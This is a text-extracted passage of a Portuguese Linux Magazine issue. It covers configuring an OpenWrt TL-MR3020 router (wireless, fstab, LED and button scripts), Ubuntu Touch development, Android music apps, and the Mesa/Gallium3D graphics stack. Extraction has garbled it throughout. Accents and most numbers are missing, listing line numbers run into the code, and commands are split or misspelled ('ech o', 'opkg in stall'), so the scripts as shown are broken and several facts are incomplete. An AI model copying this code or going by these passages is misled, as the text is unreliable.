Como uma adio til ao TL-MR3020, recomendamos um hub USB mini Pearl(fgura 1). Este dispositivo integra um leitor de micro-SDHC e, portanto, forneceo sistema de arquivos raiz avanado descrito neste artigo em um carto de me-mria, sem bloquear a porta USB.
A placa do roteador contm portas adicionais, mas o TP-Link no faz o roteamentodelas. Se o usurio usar um ferro de solda poder anexar outros componentes, comoum console serial, uma interface I2C ou uma antena externa. A wiki do OpenWrtapresenta algumas fotos e links para instrues relevantes sobre o TL-MR3020[3].
Listagem 2: /etc/config/wireless01# /etc/config/wireless ----------0203config wifi-device radio004option type mac8021105option channel 1106option macaddr 90:f6:52:e6:d7:b207option hwmode 11ng08option htmode HT20
09list ht_capab SHORT-GI-2010list ht_capab SHORT-GI-4011list ht_capab RX-STBC112list ht_capab DSSS_CCK-4013# REMOVE THIS LINE TO ENABLE WIFI:14# option disabled 11516config wifi-iface17option device radio018option network wifi19option mode sta20option ssid 'my-ssid'21option encryption psk222option key 'secret'
-
5/22/2018 Linux New Mwdia - Segurana
14/29
63Linux Magazine #106 | Setembrode 2013
alterar a configurao dos pontos de
montagem no arquivo /etc/config/
fstab. As linhas 10-16na listagem 4so importantes. A ltima linha dalistagem 3copia todo o sistema dearquivos raiz para o pendrive. Criarum backup agora aconselhvel. O
sistema ainda far o boot, mesmosem o pendrive inserido: neste caso,
ele simplesmente ignora os dispo-sitivos no existentes.
Depois de um reboot com um
pendrive, finalmente teremos mais
espao em disco. Quaisquer pa-
cotes adicionados agora poderoser armazenados l. Isto posto, tero sistema de arquivos raiz em umdispositivo USB muito til. Pode-
mos modificar a configurao comos editores habituais em um PC efacilmente copiar os dados entre os
locais (por exemplo, para backups).
Neste ponto, a configurao bsica
est concluda, exceto por algumascoisas, como o hostname. O restante
do procedimento depende de como
ser utilizado o roteador, sendo pos-
svel usar o gerenciador de pacotespara recuperar e configurar o soft-
ware necessrio. O procedimento
no OpenWrt no diferente do dequalquer outro tipo de distribuio.
Botes e LEDsPor meio da interface web ou SSH,
podemos controlar completamenteo TL-MR como um mini servidor.
No entanto, mais fcil utilizar os bo-tes existentes. O boto WPS original adequado para desencadear aesindividuais, e o interruptor (slide switch)
na lateral (com trs posies) faz a co-
mutao entre as diferentes condies
de operao (mais sobre isso depois).
Os LEDs servem como uma espcie
de dispositivo de sada. Trs estadosdiferentes so possveis: ligado, des-ligado ou piscando. Em combinaocom os botes, podemos compilar
alguns recursos interessantes. Do pon-
to de vista tcnico, preciso controlar
os LEDs nos arquivos abaixo de /sys/class/leds(por exemplo, para o WPSLED, este o diretrio/sys/class/leds/
tp-link:green:wps). Os fabricantes doOpenWrt escondem a complexidade,
Quadro 2: Como configurar o OpenWRTO sistema de configurao OpenWrt continua a ser muito consistente emtodos os pacotes relacionados ao sistema. Todos os arquivos de configu-rao esto localizados em /etc/confige so estruturados apenas arqui-vos de texto simples que so mais facilmente alterados em um editor.Para a operao de produo do roteador posteriormente, a interfaceweb a alternativa preferida do editor: aqui, pode-se facilmente mo-dificar os parmetros de configurao individuais e consultar o estado
do sistema (fgura 4). Outra alternativa uma interface para a linha decomando. O comando:
$ uci get system.slider.handler
l o valor da opo handler na seo slider do arquivo /etc/config/sys-tem. Para scripts, a biblioteca /lib/functions.sh oferece alguns utilitriosque facilitam significativamente a definio das configuraes.
Listagem 3: Preparao do pendrive USB01# Set up the root filesystem on a USB stick02# Basic USB support (USB 1.1 and USB 2)03opkg update04opkg install kmod-usb-uhci kmod-usb-ohci kmod-usb205insmod uhci06insmod usb-ohci07insmod usbcore08insmod ehci-hcd0910# USB Storage (FAT requires additional modules11# that you can upgrade later, however)12opkg in stall kmod-usb-storage-mount
block kmod-fs-ext4-core kmod-scsci1314# Prepare USB stick (on the PC)15# -> Partition with three partitions (root, home, swap)16# fdisk /dev/sdb etc.17# -> Format partitions with ext4 or swap18# mkfs.ext4 /dev/sdb119# mkfs.ext4 /dev/sdb220# mkswap /dev/sdb32122# Prepare root on USB (copies old root file system)
23mkdir -p /mnt/usb24mount /dev/sda1 /mnt/usb25tar -cvf - -C /overlay . | tar -xf - -C /mnt/usb26umount /mnt/usb
Listagem 4: Configure ospontos de montagem01# Configure mountpoints02config global automount03option from_fstab 104option anon_mount 10506config global autoswap07option from_fstab 1
08option anon_swap 00910config mount11option target /overlay12option device /dev/sda113option fstype ext414option options rw,sync15option enabled 116option enabled_fsck 01718config mount19option target /home20option device /dev/sda221option fstype ext422option options rw,sync23option enabled 124option enabled_fsck 12526config swap27option device /dev/sda328option enabled 1
-
5/22/2018 Linux New Mwdia - Segurana
15/29
64 www.linuxmagazine.com.br
e o usurio normalmente s precisaeditar a configurao no arquivo /etc/
config/system(listagem 5, linhas -).Normalmente, o OpenWRT con-
templa um conjunto de LEDs que
identifica os estados de funciona-
mento de componentes individuais,
tais como a rede ou interface USB.No entanto, podemos ajustar os pa-
dres para atender s necessidadesde cada usurio. Configurar o switch
tambm fcil. Precisamos configurar
os eventos do sistema do kernel, para
que ele acione (triggers) os botes de
evento apropriados. Para fazer isso,edite o arquivo /etc/hotplug2.rulese remova o cursor antes da string
^Buttons. Como esta uma lista deexcees, habilitamos os eventos
para os botes removendo o sinal
de comentrio. A partir de agora, o
sistema executa todos os scripts nodiretrio /etc/hotplug/buttonpara
cada evento do boto. As variveisBUTTONe ACTIONesto definidas.
Um exemplo que demonstra a
interao com os LEDs exibido nalistagem 6. Este script apenas parao boto WPS(linha 22), e faz com queo WPS LED pisque por trs segundos
(linhas 6-8e10) e, em seguida, apague
por mais trs segundos. Quando sol-
tamos o boto, o script aciona o LEDnovamente (linha 19). Em vez de arma-
zenar cada script individualmente no
diretrio Buttone consultar o statusdo switch l, como na listagem 5, fazsentido fazer o download de um script
de boto genrico do OpenWrt [4].Depois, podemos configurar o switch
de forma semelhante a dos LEDs em
/etc/config/system.O boto WPS est configurado
como um switch desligado aqui: sepressionarmos o boto por pelo me-
nos trs e no mximo seis segundos e
soltarmos em seguida, o sistema ser
desligado (linhas 37-42na listagem 5).
Esta etapa tambm revela o signi-ficado do programa na listagem 6; oboto do LED pisca durante trs se-gundos e, em seguida, desliga-se por
trs segundos assim no temos que
Listagem 5: Edio do arquivo/etc/config/system01# Configuring LEDs and buttons02config system03option hostname 'jupiter.
bablokb-local.de'04option timezone
'CET-1CEST,M3.5.0,M10.5.0/3'05
06config timeserver 'ntp'07list server '0.openwrt.pool.ntp.org'08list server '1.openwrt.pool.ntp.org'09list server '2.openwrt.pool.ntp.org'10list server '3.openwrt.pool.ntp.org'11option enable_server '0'1213config led 'led_usb'14option name 'USB'15option sysfs 'tp-link:green:3g'16option trigger 'usbdev'17option dev '1-1'18option interval '50'1920config led 'led_wlan'21option name 'WLAN'22option sysfs 'tp-link:green:wlan'23option trigger 'phy0tpt'2425config led 'led_lan'26option name 'LAN'27option sysfs 'tp-link:green:lan'28option trigger 'netdev'29option dev 'eth0'30option mode 'link tx rx'3132config led 'led_wps'33option name 'wps'34option sysfs 'tp-link:green:wps'
35option trigger 'default-on'3637config button38option button 'wps'39option action 'released'40option min '3'41option max '6'42option handler 'halt'4344config button45option button 'wps'46option action 'released'47option min '0'48option max '2'
49option handler 'logger wps pressed0-2s'5051config slider 'slider'52option handler '/usr/sbin/handle_
slider'
Listagem 6:Interao com o LED01#!/bin/sh02# Handle button events0304set_led_blink() {05# Switch flashing on (1s
on / 0.2 sec off)06ech o timer >
/sys/class/leds/tp-link\:green\:wps/trigger07ech o 1000 >/sys/class/leds/tp-link\:green\:wps/delay_on08ech o 200 >/sys/class/leds/tp-link\:green\:wps/delay_off09# Turn off after three
seconds10sleep 311echo none > /sys/class/
leds/tp-link\:green\:wps/trigger
12# Turn on after threeseconds
13sleep 314set_led_on15}1617set_led_on() {18# Turn on LED19ech o default-on >/sys/class/leds/tp-link\:green\:wps/trigger20}2122if [ "$BUTTON" = "wps" ];
then
23if [ "$ACTION" = "pressed" ];then
24set_led_blink &25else26set_led_on27fi28else29exit 030fi
Listagem 7: Checando ostatus do desbloqueador01#!/bin/sh02# Read the slider (aka
BTN_0/BTN_1)03# rmmod uses underscores,
insmod uses strokes!04rmmod gpio_button_hotplug
# Remove kernel module
05echo 18 > /sys/class/gpio/export # export BTN_006echo 20 > /sys/class/gpio/
export # export BTN_107cat /sys/class/gpio/gpio18/
value > /var/run/BTN_0 #Status BTN_0
08cat /sys/class/gpio/gpio20/value > /var/run/BTN_1 #Status BTN_1
09echo 18 > /sys/class/gpio/unexport # unexport BTN_0
10echo 20 > /sys/class/gpio/unexport # unexport BTN_1
11insmod gpio-button-hotplug# Load kernel module
-
5/22/2018 Linux New Mwdia - Segurana
16/29
65Linux Magazine #106 | Setembrode 2013
contar para desligar o sistema. Da mes-
ma forma, tambm podemos usar oboto WPS para iniciar outra operao
com cliques curtos. A listagem 5(linhas
-) configura uma entrada de logpara fins de demonstrao.
Deslizar paradesbloquearO desbloqueador (slide switch) doTL-MR um pouco mais com-plicado por dois motivos. Primeiro,
o kernel no o identifica como umboto, mas como dois; mapear ostrs estados possveis conta como bits. Cada alterao de estado
aciona dois eventos, que atingemo script de processamento sequen-
cialmente, mas devem ser avaliados
em conjunto. Em segundo lugar, osistema de eventos s identifica asalteraes de estados.
Agora podemos arriscar um pe-
queno script que verifica o status dodesbloqueador durante o boot, porexemplo, para configurar o ambiente
de rede. Esse aspecto, no entanto, apenas sugestionado na documen-tao disponvel na wiki do OpenWrt.
A listagem 7mostra como: o script
armazena o status dos dois botesBTN_0eBTN_1em arquivos devidamen-
te nomeados em /var/run. O script
executado uma vez durante a ini-cializao, a partir de /etc/rc.local.
Em contraste, o script na listagem 8executado para cada evento do boto.
Ele atualiza o boto de status em /var/
run. Alm disso, ele inicia um script deprocessamento. A magia extra nas
linhas 10-12garante que apenas umscript de processamento se inicie. O
tempo de espera antes do processa-mento (linha 21) garante que todos os
eventos relevantes do boto tambm
sejam recebidos e processados. As
linhas 16e 17recuperam o script deprocessamento do arquivo de con-
figurao em /etc/config/system. O
script de processamento, em seguida,
comea na linha 22.Um exemplo do script exibido
na listagem 9. Ele l o status do des-
bloqueador e reconfigura a rede. Os
Quadro 3: Mais exemplos de aplicaesA utilidade do TL-MR3020 resultado do baixo consumo de energia e mobilidade. Ele pode ser utilizado como um servidor
de sincronizao usando o aplicativo Rsync for Android para sincronizar dados entre dispositivos mveis, o servidor eoutros computadores. Na estrada, o servidor atua como um roteador e emula uma rede domstica, sem a necessidadede reconfigurar o zoo mvel.
Cenrios de aplicao detalhados para o TLMR3020 podem ser encontrados online atravs de uma simples pesquisa na web.Estes variam de servidores web e gateways VPN a plataformas de rede social simples. Para explorar os limites do computador,tambm instalamos o ownCloud no TL-MR3020. O aplicativo precisa de um servidor web e uma pilha PHP completa.
Recursos bsicos como a visualizao e manuteno do calendrio tambm funcionam, porm mais lentamente. Alm
disso, o TL-MR3020 quebrou a reprodutibilidade ao tentar fazer o upload de vrias imagens ao mesmo tempo. Talvez umpouco de ajuste possa ajudar, mas para executar o ownCloud efetivamente, o usurio precisa de algo mais poderosono lado do hardware.
Listagem 8: Atualizao do boto de status01#!/bin/sh02# Handle slider events03. /lib/functions.sh04DELAY=505LOCK=/var/run/slider.lock0607# --- Run Update (asynchronous) ---08run_handler() {09# Only start if not already active10if ! mkdir "$LOCK" 2>/dev/null; then11logger "update-script already running"12exit 013fi1415# Read processing script from /etc/config/system16config_load system17config_get handler slider handler18logger "handler-script: $handler"1920logger "wait $DELAY seconds for all events"21sleep $DELAY22eval $handler # Execute handler23rm -fr "$LOCK"24}2526# --- Main Program ------------------27logger "Process event '$ACTION' for $BUTTON"
2829# Ignore WPS button30if [ "$BUTTON" = "wps" ]; then31exit 032fi3334# Update button file to match event35if [ "$ACTION" = "pressed" ]; then36echo "1" > "/var/run/$BUTTON"37else38echo "0" > "/var/run/$BUTTON"39fi40# Run asynchronously41run_handler & # (do not block event handling)
-
5/22/2018 Linux New Mwdia - Segurana
17/29
66 www.linuxmagazine.com.br
arquivos de rede atuais so apenas
links simblicos; assim, a reconfigu-
rao consiste em apontar os linkssimblicos para os novos arquivosde configurao. Por exemplo,/etc/
config/network.APcontm a configu-
rao de rede quando o cursor dedesbloqueio est na posio AP. Faz
sentido iniciar o script de processa-
mento no momento da inicializao
(em /etc/rc.local), aps a leitura do
status do cursor.
ConclusoNeste artigo explicamos o hardware,
assim o usurio apenas precisa com-
binar os componentes individuais.
Para informaes mais detalhadassobre a obteno de um dispositivo
de conexo UMTS para executar ouimplementar cenrios de rede espe-
cficos, consulte a wiki do OpenWrt.O pequeno roteador TL-MR
no pode cobrir todas os aplicativos
(quadro 3). No entanto, os mecanis-
Listagem 9:Processamento do script01#!/bin/sh02# Processing script for the slider03logger "Execute $0"0405# Read status of slider
06if [ cat /var/run/BTN_0` = "0" ]; then07slider="WISP"08elif [ cat /var/run/BTN_1` = "0" ]; then09slider="3G"10else11slider="AP"12fi13logger "Status of slider: $slider"1415# Remove old symlinks16rm /etc/config/dhcp17rm /etc/config/network18rm /etc/config/wireless1920# Set new symlinks
21ln -s dhcp.$slider /etc/config/dhcp22ln -s network.$slider /etc/config/network
23ln -s wireless.$slider /etc/config/wireless
2425# Restart network and DHCP26/etc/init.d/network restart27/etc/init.d/dnsmasq restart
mos descritos aqui so pelo menos
similares para outros dispositivos,incluindo os de outros fabricantes.Na extremidade superior do espec-
tro de potncia esto os dispositivos
QNAP NASque vm munidos com
o OpenWrt. No entanto, a gama deservios pr-configurados torna apersonalizao mais difcil.n
Mais informaes[1]TP-Link: http://www.tp-link.com.de/
[2]Projeto OpenWrt:ht-tps://openwrt.org
[3]Detalhes para TL-MR3020:http://wiki.openwrt.org/
toh/tp-link/tl-mr3020/
[4]Processamento genri-
co de botes de eventos:https://dev.openwrt.org/
browser/trunk/target/li-
nux/atheros/base-files/etc/
hotplug.d/button/00-button/
Disponvel no site
www.LinuxMagazine.com.br
Principais comandos de
configurao de um
roteador Cisco
Temas e configuraes
avanadas
Segurana, dicas, truques
e resoluo de problemas
Coleo
Academy!
-
5/22/2018 Linux New Mwdia - Segurana
18/29
67Linux Magazine #106 | Setembrode 2013
Desenvolvimento
para Ubuntu TouchAprenda a desenvolver aplicativos para o Ubuntu Touch
e torne seu dispositivo mvel em um computador Linux de bolso!
por Alessandro de Oliveira Faria (Cabelo)
Na edio anterior da Linux
Magazine, falei sobre a ins-
talao, configurao e ou-
tros detalhes para que o leitor possainiciar no mundo do Ubuntu Touch.
Nesta edio, vou abordar o desen-
volvimento para esta til plataforma.
A tecnologia utilizada no Ubun-
tu SDK o Qt (e como ambiente de
desenvolvimento o Qt Creator). Uti-
lizei para testes o ambiente Ubuntu
. para compilao do exemplo
e ressalto que outras distribuies
tambm funcionam mas demandam
maior esforo e ateno detalhes
adicionais, que no so o objetivo
deste artigo. Os comandos para
instalar o Ubuntu SDK so:
sudo add-apt-repositoryppa:canonical-qt5-edgers/qt5-propersudo add-apt-repositoryppa:ubuntu-sdk-team/ppa
sudo apt-get updatesudo apt-get install ubuntu-sdknotepad-qml
Agora que o SDK est instalado,
inicie a interface de desenvolvimento
do Qt (Qt Creator, fgura 1), pressio-
ne a tecla[CTRL+N]
e na janela dedilogo, selecione a opo Ubuntu
Touch/Simple UI/Choose. Defina o
nome do projeto, a localizao do
diretrio e clique em Next. Ao tr-
mino do processo, ser exibido um
resumo do projeto; ento clique no
boto Finish(fgura 2).
Para facilitar o incio do desenvol-
vimento, insira o cdigo presente no
endereo[1]no arquivo.qmle execute
o programa, pressionando o atalho
[Ctrl+R]ou execute-o diretamente
pelo terminal atravs do comando:
qmlscene [caminho-completo-do-arquivo.qml]
Resumidamente, este programa
obtm os valores vigentes de cota-
o das moedas mundiais pelo site
do European Central Bank atravs deum XML[2]e efetua o clculo de con-
verso durante a digitao do valor no
campoFieldTextou atravs da seleco
do tipo da moeda (Buttom) (fgura 3).
Um breve resumo do desenvolvimento
bsico de aplicativos encontra-se em
[3]. A partir daqui, partiremos para o
Deploydo aplicativo.
Vamos enviar o aplicativo para o
Ubuntu Touch, mas para obter sucesso
devemos efetuar as devidas configura-
es. Em primeiro lugar, conecte o cabo
USB no dispositivo e no computador
e selecione Devicesou Dispositivos
na interface do seu Qt Creator para
estabelecer a comunicao (fgura 4).
Tutorial
Figura 1O ambiente de desenvol-vimento utilizado o Qt Creator. Figura 2 Resumo da criao do novo projeto.
-
5/22/2018 Linux New Mwdia - Segurana
19/29
68 www.linuxmagazine.com.br
device para copiar automaticamen-
te as configuraes de rede sem fio
(senha, SSID , canal e outros). Aps
este procedimento a instalao do
openssh-serverser iniciada para que
seja possvel acessar o aparelho
em modo desenvolvedor (fgura 5).Vale a pena mencionar que, no
modo avanado, algumas opes
como atualizao da imagem, reboot
e outros recursos esto disponveis.
Uma vez que o dispositivo esteja
configurado no modo debug, basta
pressionar o atalho [CRTL+F]para
enviar o aplicativo para o dispositivo
detectado e execut-lo.n
Para identificar o aparelho, cli-
que no boto Detect Devices ou
dependendo do estado do dispo-
sitivo, clique em Redetect Devices.
O nmero serial do dispositivo ser
exibido no canto superior esquer-
do se tudo estiver funcionando
corretamente. Se o Ubuntu Touch
estiver com a rede sem fio configu-
rada, clique em Enable developer
mode, caso contrrio clique em
clone network config from host to
Figura 3 Tela de digitao de dados do conversor de moedas paraUbuntu Touch.
Mais informaes[1] Download do cdi-go deste artigo: http://www.linuxmag.com.br/is-sues/106/conteudoqml.txt
[2] XML da cotao do dia
das moedas mundiais: http://www.ecb.int/stats/euro-fxref/eurofxref-daily.xml
[3] Desenvolvimento paraUbuntu:http://developer.ubuntu.com/get-started/gomobile/#step-write-app
[4] Exemplo (cdigo fontecompleto) do conversor demoedas para Ubuntu Tou-ch:https://bazaar.launchpad.net/~dpm/+junk/CurrencyCon-verterUpdated/files/8
Figura 5 Modo de desenvolvedor habilitado.
Figura 4 Deteco de dispositivos no Qt Creator.
Gostou do artigo?Queremos ouvir sua opinio.
Fale conosco em:[email protected]
Este artigo no nosso site:http://lnm.com.br/article/8981
Alessandro de Oliveira Faria scio-fundador da
empresa NETi Tecnologia fundada em 1996, empresa
especializada em desenvolvimento de software e
solues biomtricas. consultor biomtrico na
tecnologia de reconhecimento facial, atuando na rea
de tecnologia desde 1986, levando o Linux a srio
desde 1998, membro colaborador da comunidade
Viva O Linux, mantenedor da biblioteca open-source
de vdeo captura, embaixador e membro openSUSE
entre outros projetos.
-
5/22/2018 Linux New Mwdia - Segurana
20/29
69Linux Magazine #106 | Setembrode 2013
Aperte o play!Os melhores aplicativos de msica e truques para melhorar a qualidade de som do seu Android.
por Flvia Jobstraibizer
Ningum vive sem msica.
Essa uma mxima na qual
esta humilde autora acredita
piamente. Mesmo os ermites em
algum momento cantarolam algu-
ma msica em meio sua solido. O
Android possui excelentes aplicati-
vos para msica, seja para execuo,
organizao de biblioteca musical
ou mesmo para localizar podcasts,
audiolivros e outros recursos. Tam-
bm h diversos truques e macetes
que podemos fazer para melhorar
a qualidade de audio dos disposi-
tivos equipados com o simptico
sistema do robozinho.
Msica napalma da mo
Alguns aplicativos j conhecidos paraexecuo de msicas como NPlayer
[1], possuem uma organizao inte-
ressante da biblioteca musical, onde
as faixas podem ser localizadas atra-
vs de uma nuvem de tags, com-
posta pelo nome do cantor, nome
da msica ou mesmo pelo tipo de
msica (fgura 1). A organizao por
capas de lbuns (fgura 2) tambm
outro recurso presente no NPlayer e
comum a outros importantes tocado-
res de msicas, como o MusiXMatch
[2](quem se lembra do Music Match
Jukebox que existia pra Windows nos
anos ? Este se parece MUITO com
ele). Atualmente o MusiXMatch um
dos preferidos por quem deseja alm
dos recursos comuns acompanhar
as letras das msicas em tempo real
(e com tempo real, quero dizer que
o aplicativo baixa a letra da msica
enquanto ela executada, contanto
que uma conexo de Internet estejadisponvel). O aplicativo possui um
bom equalizador, que auxilia o usurio
a predefinir o melhor ambiente de som
possvel em seu dispositivo (fgura 3).
O bom e velho Winamp tambm
modernizou-se e veio parar nos dis-
positivos mveis. A organizao de
msicas por pastas um diferencial,
evitando a mistura homrica feita
por outros players (fgura 4). O apli-
cativo est disponvel em duas ver-
Android
Figura 1Organizao de audio por palavras-chave, intrpretes outipo de msica.
Figura 2As capas dos lbuns tambm podem ser uma forma deorganizar o contedo.
-
5/22/2018 Linux New Mwdia - Segurana
21/29
70 www.linuxmagazine.com.br
ses: gratuita[3]e Pro, com recursos
adicionais como a organizao por
pastas, claro, e outros diferenciais
como o a execuo de qualquer audio
streaming atravs de um URL direto.
O PowerAmp [4]talvez seja um
dos mais completos no que tange
configuraes de audio. Possui o
mais completo equalizador (fgura 5),
configurao de balano, baixos e ou-
tros bastante sensvel e ainda possui
widgets personalizveis para que seja
possvel inclu-lo na rea de trabalho
sem engasgos da msica. Tais recursos
esto presentes apenas na verso Pro
(que custa cerca de R,) que vale
muito a pena ser adquirida.
Para ouvir rdio, no limite-se ao
aplicativo padro do Android (e h
alguns dispositivos importados que
nem mesmo este aplicativo padro
possuem). Neste campo, as opes
so inmeras. O TuneIn [5] um dos
mais populares e funciona basicamente
atravs da Internet. Com ele possvel
ouvir mais de estaes de rdio
via streaming e que podem ser locali-
zadas por tipo, localizao (somente
rdios do Brasil, por exemplo) e at
mesmo por idioma (fgura 6).
Aumente o
poder de audioAlguns aplicativos podem ajudar a
melhorar o poder de audio do seu dis-
positivo. Mesmo dispositivos um tanto
quanto limitados podem beneficiar-se
obtendo melhor qualidade de audio,
Figura 5 O PowerAmp possui um dos mais completos equalizadores.
Figura 6Para ouvir mais de 70000 rdios online, o TuneIn a melhor opo.
Figura 3Equalizador do MusiX-Match, til para melhorar a qua-lidade do audio em execuo.
Figura 4A organizao por pastasdo Winamp Pro um diferencialdo aplicativo.
-
5/22/2018 Linux New Mwdia - Segurana
22/29
71Linux Magazine #106 | Setembrode 2013
tratamento de ruidos e sensibilidade
mais refinada em graves e agudos.
Um exemplo disso o Music Volu-
me EQ[6], que alm de gratuito um
dos aplicativos mais bem avaliados no
quesito aumentar o volume do som
do aparelho, alm de possuir confi-
guraes refinadas para melhorar a
qualidade do audio (fgura 7).
O Equalizer [7] outro aplicati-
vo interessante. Em meus testes, a
galeria de efeitos pr-configurados
(fgura 8) rendeu surpresas pois a
qualidade e nitidez do som melho-
raram significativamente, at mes-
mo em audio extrado da Internet.
Um dos mais surpreendentes no
entanto, o aplicativo Ambiance[8],
que gera aleatoriamente cerca de
efeitos sonoros que isolam o
barulho externo (claro que ter um
fone de ouvido de tima qualidade
vai garantir esse excelente resultado).
Com um fone de ouvido da Phillips
que j possui o recurso de isolamen-to de barulho, obtive a inacreditvel
chance de no escutar nada alm
da msica que estava ouvindo, em
meio ao trnsito catico de So Pau-
lo enquanto me dirigia redao
da Linux Magazine. O aplicativo
possui ainda recursos como des-
pertador com sua msica preferida
e at gravador de audio (til para
gravar palestras, por exemplo). Por
favor pague a bagatela de R,
neste aplicativo e surpreenda-se
assim como eu (fgura 9).
ConclusoOpes para tornar a experincia de
audio incrvel no faltam. Leia aten-
tamente os comentrios dos usu-rios antes de baixar determinados
aplicativos de audio e desconfie de
aplicativos que exigem permisses
absurdas para instalao (como um
determinado player que informa a
necessidade de acesso aos seus SMS
e catlogo de endereos no momento
da instalao), afinal, tudo o que voc
no quer ouvir uma msica triste por
conta de algum aplicativo malicioso.n
Figura 7O Music Volume EQ tur-bina significativamente o audiodo seu dispositivo.
Figura 8A galeria de efeitos pr-configurador do Equalizer surpre-ende durante o uso.
Figura 9Anular o barulho externo o recurso principal do Ambiance.
Mais informaes[1]N7Player: https://play.google.com/store/apps/details?id=com.
n7mobile.nplayer
[2] MusiXMatch: https://play.google.com/store/apps/details?id=com.mu-sixmatch.android.lyrify
[3]Winamp Free: https://play.google.com/store/apps/details?id=com.nullsoft.winamp
[4]PowerAmp: https://play.google.com/store/apps/details?id=com.ma-xmpz.audioplayer.unlock
[5]TuneIn:https://play.
google.com/store/apps/details?id=tunein.player
[6] Music Volume EQ:https://play.google.com/store/apps/details?id=hr.podlanica
[7] Equalizer: https://play.google.com/store/apps/details?id=com.smartan-droidapps.equalizer
[8]Ambiance: https://play.google.com/store/apps/details?id=com.ur-banapps.ambiance
Gostou do artigo?Queremos ouvir sua opinio.Fale conosco em:[email protected]
Este artigo no nosso site:http://lnm.com.br/article/9005
-
5/22/2018 Linux New Mwdia - Segurana
23/29
72 www.linuxmagazine.com.br
Tubo grficoA ideia simples: se o driver da placa grfica no oferece grficos 3D, uma ajuda especial delegaria
todos os clculos 3D ao processador principal. Neste artigo, explicamos como fazer esse trabalho.
por Tim Schrmann
OStarter est inserido emuma janela com efeito vio-
leta cintilante com som-bras sutis e rodeado por um brilho
suave quando minimizado. Estes
efeitos puros da rea de traba-lho do Unity s so possveis se
o Ubuntu, ao iniciar, detectar aplaca grfica e localizar um dri-ver adequado, o que por sua vez
fornece uma acelerao D. Isso,
s vezes mas nem sempre fun-
ciona, especialmente em placas
grficas mais antigas, notebooks
e netbooks (figuras1 e 2).
LLVMpipeO Ubuntu . costumava iniciar
o Unity D, o irmo menos eficaz
do Unity. Com o Ubuntu ., aCanonical substituiu o Unity Dpelo LLVMpipe. Este driver de pla-
ca grfica invocado quando oUbuntu precisa usar a placa deextenso grfica apenas no modo
D. O LLVMpipe permite que o pro-
cessador principal controle todos
os efeitos D. Desta forma, o Unity
pode funcionar sem a acelerao
D em computadores mais antigos
ou mquinas virtuais, enquantoos desenvolvedores da Canonical
podem se concentrar em um ni-
co ambiente de trabalho Unity. O
LLVMpipe tambm pode executar
outros programas D.
A fgura 3mostra o caminho per-
corrido pelos arquivos grficos do
aplicativo at a tela. Com o Linux,
a maioria dos programas D usam
a biblioteca grfica OpenGL, queprev, entre outras coisas, algumas
funes bsicas para desenhar li-nhas e superfcies. Os detalhes so
definidos pelo padro OpenGL, que
o consrcio de indstrias Khronos
Group [1]gerencia e desenvolve.Fabricantes de placas grficas
normalmente fornecem a seusdrivers uma biblioteca OpenGLotimizada, que est intimamente
conectada maior parte dos dri-
vers proprietrios do kernel e pode,
portanto, mover rapidamente osarquivos para as placas grficas.Mas, em primeiro lugar, nem toda
placa grfica possui um driver pro-
prietrio e, em segundo lugar, no
Anlise
Figura 1 O Unity desenha uma sombra ao redor das janelas...
-
5/22/2018 Linux New Mwdia - Segurana
24/29
73Linux Magazine #106 | Setembrode 2013
to fcil examinar o cdigo fonte
em caso de problemas. Felizmente,
ainda existe uma alternativa.
Drivers grficosBrian Paul comeou a desenvol-
ver a biblioteca livre e aberta na
Internet em e chamou-a de
Mesa (tambm conhecida como
Mesa D [2]). No incio, a bibliote-
ca usava o processador principal
para calcular grficos D. A sada
era relativamente lenta, mas ainda
entregava imagens D. Ento, em
, Brian Paul fundou a empresa
de consultoria Tungsten Graphics
com outros quatro especialis-tas grficos. Eles desenvolveram
um novo driver grfico chamado
GalliumD (ou apenas Gallium
[3], para abreviar) em . Aideia principal era tornar o driver
menor, para mant-lo compatvel
com outras bibliotecas grficasalm do Mesa e torn-lo maisfacilmente transportvel, o quesimplificaria significativamenteo desenvolvimento de drivers de
placas grficas. O novo sistema foi
um sucesso, pelo menos no Linux,
principalmente porque integrava
o Mesa e usava-o para sada.
Como mostrado na figura 3, o
Mesa calcula os dados D e passa-
os adiante para o chamado State
Tracker, que prepara as instrues
OpenGL para torn-las compreen-
sveis ao driver grfico GalliumD.
Cada biblioteca grfica possui um
state tracker prprio, atualmente
disponvel tambm para a biblio-
teca de grficos vetoriais OpenVG
[4]. Atravs de uma interface fixa,
o state tracker, em seguida, passa
os arquivos grficos para o driver
de placa grfica atual, tambm co-
nhecido comopipe driver. O state
tracker no executa no kernel Linux
mas no espao do usurio, assim
como muitos outros programas. Em
seguida, converte os dados em D
para que o dr iver os compreenda.
A placa grfica passa o resultadofinal para a interface chamadaGallium Winsys, a qual retorna os
arquivos para o mdulo de ker-nel apropriado placa grfica. O
mdulo do kernel, por fim, passa
os dados D para o hardware da
placa grfica. No Linux, o mdulo
do kernel geralmente conheci-
do como gerenciador de renderi-
zao direta, ou Direct Rendering
Manager(DRM).
primeira vista, a interfaceWinsys e o kernel DRM podem pa-
recer redundantes, afinal, o driver
da placa grfica deve ser capaz de
se comunicar diretamente coma placa; no entanto, estas duasetapas intermedirias so as que
tornam os drivers mais elegantes
e independentes de plataforma.
Apenas a interface Winsys preci-
sa saber qual sistema operacional
est atualmente sendo afetado e
como se comunicar com ele. Comoela apenas passa sobre os dados,
a interface pode ser pequena ecriada rapidamente. Alm disso,
a interface pode usar qualquerdriver de placa grfica, por issoprecisa ser desenvolvida apenas
uma vez para cada sistema ope-
racional. O atual driver da placa
grfica pode, portanto, permane-
cer praticamente inalterado por
todas as plataformas.
Figura 3Arquivos grficos atraves-sam alguns componentes no Linux,mas o processamento rpido.
Figura 2 ...enquanto seu homlogo Unity 2D no o faz. Aqui o usuriotem que se contentar com uma colorao mais escura.
Aplicativos (Unity)
OpenGL (Mesa)
OpenGL State Tracker
Open 3D Interface
Driver GA Winsys
Linux DRM (Kernel)
Hardware
Drivers especficos GPU(Pipe-Driver)
-
5/22/2018 Linux New Mwdia - Segurana
25/29
74 www.linuxmagazine.com.br
Para obter uma visualizao Dacelerada no Linux, portanto, o usu-
rio precisa de um driver GalliumD
que se encaixe na placa grfica e um
mdulo do kernel DRM correspon-
dente. Infelizmente, os principaisfabricantes de cartes grficos fa-
zem criaes prprias, de modo que
os desenvolvedores livres acabam
tendo que viol-los mais uma vez.
Atualmente os drivers GalliumD
esto disponveis para hardwareIntel e algumas placas grficas ATI;a NVidia, entretanto, suporta o co-
nhecido driver Nouveau.
Como os fabricantes no publi-
cam detalhes de hardware em seus
chips grficos, o desenvolvimento
de drivers livres geralmente um
processo tedioso. Ainda hoje, oNouveau no fornece dados de de-
